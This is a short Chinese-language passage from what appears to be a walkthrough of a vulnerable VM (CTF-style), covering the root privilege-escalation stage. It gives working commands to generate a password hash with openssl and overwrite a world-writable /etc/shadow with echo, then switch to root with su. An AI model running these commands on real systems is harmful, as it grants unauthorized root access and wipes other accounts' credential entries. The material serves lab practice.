终于进来了!!!!
权限提升阶段:接下来,root权限提升:
在这台VM上root的权限提升很容易。这个/etc/shadow文件对任何人可写。因为我们可以通过修改这个文件来获取root的密码。
以下链接介绍了/etc/shadow文件的组成:
https://www.cyberciti.biz/faq/understanding-etcshadow-file/
因为我们不需要读/etc/shadow这个文件,我们只需要复写它。
因此,我们把密码修改为root,如下:
1 生成密码root的加密值
openssl passwd # enter new password “root”
2 将root的加密值导入到/etc/shadow的root用户格式中
echo root:qdbEWfKM1ov2g:18844:0:99999:7::: > /etc/shadow
3 切换为root,输入密码root
su -l
完事了,这个难度是easy,其实也不简单。